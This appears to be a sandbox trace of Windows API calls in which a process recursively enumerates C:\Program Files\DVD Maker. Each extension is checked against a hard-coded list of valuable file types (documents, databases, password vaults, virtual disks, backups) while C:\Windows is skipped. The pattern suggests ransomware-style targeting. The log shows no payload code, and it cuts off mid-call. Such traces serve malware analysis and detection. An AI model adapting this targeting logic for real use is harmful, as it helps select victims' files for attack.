wsprintfW (in: param_1=0x2e4dc58, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.130] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.131] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 0 [0040.131] FindClose (in: hFindFile=0x54ad20 | out: hFindFile=0x54ad20) returned 1 [0040.131] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0040.131] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0040.131] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0040.131] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Program Files", pszFile="desktop.ini" | out: pszDest="C:\\Program Files\\desktop.ini") returned="C:\\Program Files\\desktop.ini" [0040.131] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0040.131] wsprintfW (in: param_1=0x2e4ed78, param_2="%ws." | out: param_1=".ini.") returned 5 [0040.131] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".ini.") returned 0x0 [0040.131] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0040.131] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Program Files", pszFile="DVD Maker" | out: pszDest="C:\\Program Files\\DVD Maker") returned="C:\\Program Files\\DVD Maker" [0040.132] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\DVD Maker") returned 0x0 [0040.132] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Program Files\\DVD Maker", pszFile="*" | out: pszDest="C:\\Program Files\\DVD Maker\\*") returned="C:\\Program Files\\DVD Maker\\*" [0040.132] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0040.132] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.132] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.132] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="audiodepthconverter.ax" | out: pszDest="C:\\Program Files\\DVD Maker\\audiodepthconverter.ax") returned="C:\\Program Files\\DVD Maker\\audiodepthconverter.ax" [0040.132] PathFindExtensionW (pszPath="audiodepthconverter.ax") returned=".ax" [0040.132] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".ax.") returned 4 [0040.132] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".ax.") returned 0x0 [0040.132] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.133] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="bod_r.TTF" | out: pszDest="C:\\Program Files\\DVD Maker\\bod_r.TTF") returned="C:\\Program Files\\DVD Maker\\bod_r.TTF" [0040.133] PathFindExtensionW (pszPath="bod_r.TTF") returned=".TTF" [0040.133] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".TTF.") returned 5 [0040.133] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".TTF.") returned 0x0 [0040.133] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.133] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="directshowtap.ax" | out: pszDest="C:\\Program Files\\DVD Maker\\directshowtap.ax") returned="C:\\Program Files\\DVD Maker\\directshowtap.ax" [0040.133] PathFindExtensionW (pszPath="directshowtap.ax") returned=".ax" [0040.133] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".ax.") returned 4 [0040.133] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".ax.") returned 0x0 [0040.133] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.133] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="DVDMaker.exe" | out: pszDest="C:\\Program Files\\DVD Maker\\DVDMaker.exe") returned="C:\\Program Files\\DVD Maker\\DVDMaker.exe" [0040.133] PathFindExtensionW (pszPath="DVDMaker.exe") returned=".exe" [0040.133] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".exe.") returned 5 [0040.133] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".exe.") returned 0x0 [0040.134] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.134] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="emailcldeclared.exe" | out: pszDest="C:\\Program Files\\DVD Maker\\emailcldeclared.exe") returned="C:\\Program Files\\DVD Maker\\emailcldeclared.exe" [0040.134] PathFindExtensionW (pszPath="emailcldeclared.exe") returned=".exe" [0040.134] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".exe.") returned 5 [0040.134] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".exe.") returned 0x0 [0040.134] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.134] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="en-US" | out: pszDest="C:\\Program Files\\DVD Maker\\en-US") returned="C:\\Program Files\\DVD Maker\\en-US" [0040.134] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\DVD Maker\\en-US") returned 0x0 [0040.134] PathCombineW (in: pszDest=0x2e4da50, pszDir="C:\\Program Files\\DVD Maker\\en-US", pszFile="*" | out: pszDest="C:\\Program Files\\DVD Maker\\en-US\\*") returned="C:\\Program Files\\DVD Maker\\en-US\\*" [0040.134] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\en-US\\*", lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 0x54ad20 [0040.134] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.134] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.134] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\DVD Maker\\en-US", pszFile="DVDMaker.exe.mui" | out: pszDest="C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui") returned="C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui" [0040.134] PathFindExtensionW (pszPath="DVDMaker.exe.mui") returned=".mui" [0040.135] wsprintfW (in: param_1=0x2e4dc58, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.135] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.135] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.135] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\DVD Maker\\en-US", pszFile="OmdProject.dll.mui" | out: pszDest="C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui") returned="C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui" [0040.135] PathFindExtensionW (pszPath="OmdProject.dll.mui") returned=".mui" [0040.135] wsprintfW (in: param_1=0x2e4dc58, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.135] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.135] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.135] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\DVD Maker\\en-US", pszFile="WMM2CLIP.dll.mui" | out: pszDest="C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui") returned="C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui" [0040.135] PathFindExtensionW (pszPath="WMM2CLIP.dll.mui") returned=".mui" [0040.135] wsprintfW (in: param_1=0x2e4dc58, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.135] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.135] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 0 [0040.135] FindClose (in: hFindFile=0x54ad20 | out: hFindFile=0x54ad20) returned 1 [0040.136] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.136] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="Eurosti.TTF" | out: pszDest="C:\\Program Files\\DVD Maker\\Eurosti.TTF") returned="C:\\Program Files\\DVD Maker\\Eurosti.TTF" [0040.136] PathFindExtensionW (pszPath="Eurosti.TTF") returned=".TTF" [0040.136] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".TTF.") returned 5 [0040.136] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".TTF.") returned 0x0 [0040.136] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.136] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="fieldswitch.ax" | out: pszDest="C:\\Program Files\\DVD Maker\\fieldswitch.ax") returned="C:\\Program Files\\DVD Maker\\fieldswitch.ax" [0040.136] PathFindExtensionW (pszPath="fieldswitch.ax") returned=".ax" [0040.136] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".ax.") returned 4 [0040.136] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".ax.") returned 0x0 [0040.136] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.136] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="offset.ax" | out: pszDest="C:\\Program Files\\DVD Maker\\offset.ax") returned="C:\\Program Files\\DVD Maker\\offset.ax" [0040.137] PathFindExtensionW (pszPath="offset.ax") returned=".ax" [0040.137] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".ax.") returned 4 [0040.137] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".ax.") returned 0x0 [0040.137] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.137] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="OmdBase.dll" | out: pszDest="C:\\Program Files\\DVD Maker\\OmdBase.dll") returned="C:\\Program Files\\DVD Maker\\OmdBase.dll" [0040.137] PathFindExtensionW (pszPath="OmdBase.dll") returned=".dll" [0040.137] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.137] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.137] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.137] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="OmdProject.dll" | out: pszDest="C:\\Program Files\\DVD Maker\\OmdProject.dll") returned="C:\\Program Files\\DVD Maker\\OmdProject.dll" [0040.137] PathFindExtensionW (pszPath="OmdProject.dll") returned=".dll" [0040.137] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.138] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.138] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.138] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="Pipeline.dll" | out: pszDest="C:\\Program Files\\DVD Maker\\Pipeline.dll") returned="C:\\Program Files\\DVD Maker\\Pipeline.dll" [0040.138] PathFindExtensionW (pszPath="Pipeline.dll") returned=".dll" [0040.138] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.138] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.138] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.138] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="PipeTran.dll" | out: pszDest="C:\\Program Files\\DVD Maker\\PipeTran.dll") returned="C:\\Program Files\\DVD Maker\\PipeTran.dll" [0040.138] PathFindExtensionW (pszPath="PipeTran.dll") returned=".dll" [0040.138] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.138] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.139] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.139] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="rtstreamsink.ax" | out: pszDest="C:\\Program Files\\DVD Maker\\rtstreamsink.ax") returned="C:\\Program Files\\DVD Maker\\rtstreamsink.ax" [0040.139] PathFindExtensionW (pszPath="rtstreamsink.ax") returned=".ax" [0040.139] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".ax.") returned 4 [0040.139] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".ax.") returned 0x0 [0040.139] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.139] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="rtstreamsource.ax" | out: pszDest="C:\\Program Files\\DVD Maker\\rtstreamsource.ax") returned="C:\\Program Files\\DVD Maker\\rtstreamsource.ax" [0040.139] PathFindExtensionW (pszPath="rtstreamsource.ax") returned=".ax" [0040.139] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".ax.") returned 4 [0040.139] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".ax.") returned 0x0 [0040.139] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.139] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="SecretST.TTF" | out: pszDest="C:\\Program Files\\DVD Maker\\SecretST.TTF") returned="C:\\Program Files\\DVD Maker\\SecretST.TTF" [0040.140] PathFindExtensionW (pszPath="SecretST.TTF") returned=".TTF" [0040.140] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".TTF.") returned 5 [0040.140] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".TTF.") returned 0x0 [0040.140] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.140] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\DVD Maker", pszFile="Shared" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared") returned="C:\\Program Files\\DVD Maker\\Shared" [0040.140] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\DVD Maker\\Shared") returned 0x0 [0040.140] PathCombineW (in: pszDest=0x2e4da50, pszDir="C:\\Program Files\\DVD Maker\\Shared", pszFile="*" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\*") returned="C:\\Program Files\\DVD Maker\\Shared\\*" [0040.140] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\*", lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 0x54ad20 [0040.148] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.148] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.148] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\DVD Maker\\Shared", pszFile="Common.fxh" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\Common.fxh") returned="C:\\Program Files\\DVD Maker\\Shared\\Common.fxh" [0040.148] PathFindExtensionW (pszPath="Common.fxh") returned=".fxh" [0040.148] wsprintfW (in: param_1=0x2e4dc58, param_2="%ws." | out: param_1=".fxh.") returned 5 [0040.148] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".fxh.") returned 0x0 [0040.148] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.148] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\DVD Maker\\Shared", pszFile="DissolveAnother.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" [0040.148] PathFindExtensionW (pszPath="DissolveAnother.png") returned=".png" [0040.148] wsprintfW (in: param_1=0x2e4dc58, param_2="%ws." | out: param_1=".png.") returned 5 [0040.148] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.149] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.149] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\DVD Maker\\Shared", pszFile="DissolveNoise.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" [0040.149] PathFindExtensionW (pszPath="DissolveNoise.png") returned=".png" [0040.149] wsprintfW (in: param_1=0x2e4dc58, param_2="%ws." | out: param_1=".png.") returned 5 [0040.149] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.149] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.149] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\DVD Maker\\Shared", pszFile="DvdStyles" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles" [0040.149] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 